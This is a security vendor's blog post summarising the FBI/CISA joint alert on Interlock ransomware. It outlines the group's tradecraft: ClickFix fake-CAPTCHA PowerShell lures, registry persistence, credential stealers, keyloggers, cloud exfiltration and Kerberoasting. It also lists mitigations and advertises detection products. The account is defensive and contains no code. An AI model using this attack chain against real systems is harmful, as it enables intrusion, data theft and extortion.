In mid-July 2025, researchers spread the news of the reemergence of the Interlock ransomware group, leveraging a modified version of the ClickFix malware to deliver a novel PHP-based iteration of their custom RAT. In response to the growing threat, the authoring agencies, including the FBI and CISA, have recently issued a joint cybersecurity alert notifying the global cyber defender community of the escalating Interlock ransomware group activity. Adversaries are observed gaining initial access via rare drive-by downloads from compromised legitimate sites and the ClickFix social engineering tactic, ultimately leveraging a double extortion model by exfiltrating and encrypting data to pressure victims into ransom payment.
Detect Interlock Ransomware Activity
According to IBM, breaches take over 250 days to detect and cost organizations an average of $4.99 million to recover. At the same time, ransomware operations continue to evolve, becoming more sophisticated and targeting organizations of all sizes, from large enterprises to small businesses. The latest aa25-203a alert by CISA and partners on Interlock ransomware highlights this growing threat, revealing that the group behind it has already targeted multiple victims across various industry verticals.
Register for the SOC Prime Platform to detect potential attacks against your organization at the earliest stages with a dedicated rule collection addressing TTPs associated with Interlock ransomware activity. Hit the Explore Detections button below to access the rule collection, enriched with actionable CTI and backed by a complete product suite for advanced threat detection and hunting.
All the rules are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK framework. Additionally, every rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.
Optionally, cyber defenders can apply “Interlock Ransomware” and “aa25-203a” tags to filter out content in the Threat Detection Marketplace according to their preferences. Alternatively, they can use the broader “Ransomware” tag to access a wider range of detection rules covering ransomware attacks globally.
Also, security experts might streamline threat investigation using Uncoder AI, a private IDE and co-pilot for detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, cyber defenders can use aa25-203a alert to generate Attack Flow in a single click.
Interlock Ransomware Attack Analysis Covered in the aa25-203a Alert
The Interlock ransomware group is a relatively recent entrant in the cyberthreat landscape, but it has quickly advanced in sophistication and impact. Since September 2024, Interlock ransomware operators have targeted a broad spectrum of businesses and critical infrastructure across North America and Europe. These financially motivated, opportunistic actors aim to infiltrate systems and disrupt essential services. Their attacks follow a double extortion model, encrypting and exfiltrating data, while providing victims with a unique code and directing them to contact the group via a .onion address on the Tor network, omitting an upfront ransom demand or payment details. In light of the escalating threat, the FBI, CISA, and partnering agencies have released a joint alert aimed at raising cybersecurity awareness and helping global organizations proactively defend against Interlock ransomware attacks.
So far, Interlock actors have primarily encrypted virtual machines, sparing hosts, workstations, and physical servers, although this may change in future campaigns. Additionally, the authoring agencies have noted open-source intelligence indicating potential overlaps between Interlock and Rhysida ransomware variants.
Researchers observed Interlock ransomware actors using uncommon initial access techniques, including drive-by downloads from compromised legitimate websites and social engineering tactics like the ClickFix technique, which tricks users into running a malicious Base64-encoded PowerShell command via a fake CAPTCHA. Previously, payloads were disguised as browser updates; more recently, they mimic security software updates. Notably, the newly identified ClickFix technique has been used in several other offensive campaigns, including Lumma Stealer and DarkGate. Once executed, the malware installs a custom RAT via a PowerShell script, drops it into the Startup folder, and maintains persistence. In some cases, persistence is established by modifying a Windows Registry run key named “Chrome Updater.”
Further, adversaries use PowerShell scripts to gather system info, followed by the deployment of C2 tools like Cobalt Strike, SystemBC, Interlock RAT5, and NodeSnake RAT. Once inside, they execute PowerShell commands to install a credential stealer (cht.exe) and keylogger (klg.dll), logging credentials and keystrokes. They also use Lumma and Berserk Stealers to escalate privileges. For cloud exfiltration, they exploit Azure Storage Explorer and AzCopy, as well as WinSCP for broader data theft. Lateral movement is achieved through RDP, AnyDesk, and PuTTY, with some access gained via Kerberoasting for gaining domain admin rights.
As potential Interlock ransomware mitigation measures, agencies recommend a multi-layered defense strategy, including preventing initial access by deploying DNS filtering, web access firewalls, enforcing NIST-compliant password policies, enabling MFA across all critical services, and implementing ICAM. Further defense enhancements involve regularly updating all software and firmware, prioritizing patching CVEs, and segmenting networks to limit lateral movement. By relying on SOC Prime’s complete product suite for enterprise-ready security protection backed by AI, automated capabilities, real-time threat intel, and built on zero-trust security milestones, organizations across multiple industry sectors can adopt a scalable, future-proof cybersecurity strategy.
The post Interlock Ransomware Detection: The FBI, CISA, and Partners Issue Joint Alert on Massive Attacks via the ClickFix Social Engineering Technique appeared first on SOC Prime.
